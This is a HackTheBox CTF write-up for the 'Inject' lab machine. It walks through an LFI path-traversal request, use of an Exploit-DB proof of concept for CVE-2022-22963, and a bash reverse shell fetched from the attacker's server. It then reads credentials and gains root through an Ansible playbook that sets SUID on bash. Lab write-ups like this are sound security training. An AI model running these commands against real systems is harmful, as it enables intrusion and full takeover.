HackTheBox Inject Writeup
Explore the fundamentals of cybersecurity in the Inject Capture The Flag (CTF) challenge, a easy-level experience! This straightforward CTF writeup provides insights into key concepts with clarity and simplicity, making it accessible for players at this level.
Add Hosts
10.10.11.204 inject.htb
Script to add hosts automatically
ip="10.10.11.204"
domain="inject.htb"
grep -qF "$ip $domain" /etc/hosts || echo -e "$ip $domain" | sudo tee -a /etc/hosts
Mapping
nmap -sCV inject.htb
Nmap scan report for inject.htb (10.10.11.204)
Host is up (0.051s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 ca:f1:0c:51:5a:59:62:77:f0:a8:0c:5c:7c:8d:da:f8 (RSA)
| 256 d5:1c:81:c9:7b:07:6b:1c:c1:b4:29:25:4b:52:21:9f (ECDSA)
|_ 256 db:1d:8c:eb:94:72:b0:d3:ed:44:b9:6c:93:a7:f9:1d (ED25519)
8080/tcp open nagios-nsca Nagios NSCA
|_http-title: Home
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
http://10.10.11.204:8080/upload
Lfi
curl -s 'http://10.10.11.204:8080/show_image?img=../../../../../../etc/passwd' | grep sh$
curl -s 'http://10.10.11.204:8080/show_image?img=pwn' | jq
Output
{
"timestamp": "2024-12-05T05:22:30.253+00:00",
"status": 500,
"error": "Internal Server Error",
"message": "URL [file:/var/www/WebApp/src/main/uploads/pwn] cannot be resolved in the file system for checking its content length",
"path": "/show_image"
}
curl -s 'http://10.10.11.204:8080/show_image?img=../../../pom.xml'
Realpath:
curl -s 'http://10.10.11.204:8080/show_image?img=../../../../../../../../../var/www/WebApp/pom.xml' > pom.xml
snyk test --file=pom.xml
CVE-2022-22963
Output
✗ Remote Code Execution [Critical Severity][https://security.snyk.io/vuln/SNYK-JAVA-ORGSPRINGFRAMEWORKCLOUD-2436645] in org.springframework.cloud:spring-cloud-function-context@3.2.2
introduced by org.springframework.cloud:spring-cloud-function-web@3.2.2 > org.springframework.cloud:spring-cloud-function-context@3.2.2
https://www.exploit-db.com/exploits/51577
wget https://www.exploit-db.com/raw/51577 -O poc
vpnip=$(ip a | grep -A 2 "tun0:" | grep -oP '(?<=inet\s)\d+(\.\d+){3}')
echo -e '/bin/bash -i >& /dev/tcp/'$vpnip'/9001 0>&1' > rev.sh
python -m http.server
Listener
nc -lvnp 9001
python poc --url 'http://10.10.11.204:8080/functionRouter' --command 'curl http://10.10.14.18:8000/rev.sh -o /tmp/rev.sh'
python poc --url 'http://10.10.11.204:8080/functionRouter' --command 'bash /tmp/rev.sh'
Get an Interactive Shell: Once the reverse shell connects, convert it into an interactive shell:
python3 -c 'import pty;pty.spawn("/bin/bash")'
Press Ctrl+Z to background the shell, then run:
stty size; stty raw -echo; fg
As the last step, set the terminal environment:
export TERM=xterm;
cat /home/frank/.m2/settings.xml
su phil
cat /home/phil/user.txt
Although I rarely mention using pspy on Linux, it’s essential to deploy it regularly—similar to linpeas on Linux or BloodHound on Windows—particularly when you’re stuck.
curl -s http://10.10.14.18:8000/pspy64 -o ps
chmod +x ps
./ps
After execution, we observe numerous Ansible scripts in the output.
/usr/bin/python3 /usr/bin/ansible-playbook /opt/automation/tasks/playbook_1.yml
/usr/bin/cp /root/playbook_1.yml /opt/automation/tasks/
Create an Ansible playbook designed to be executed with root privileges.
cd /opt/automation/tasks/
cat playbook_1.yml
nano shell.yml
- hosts: localhost
tasks:
- name: Set SUID bit on /bin/bash
ansible.builtin.shell:
cmd: "/usr/bin/chmod +s /bin/bash"
Now, we just wait.
watch -n 1 'ls -la /bin/bash'
-rwxr-xr-x 1 root root 1183448 Apr 18 2022 /bin/bash
Now, we just wait for the SUID changes to take effect.
-rwsr-sr-x 1 root root 1183448 Apr 18 2022 /bin/bash
bash -p
cat /root/root.txt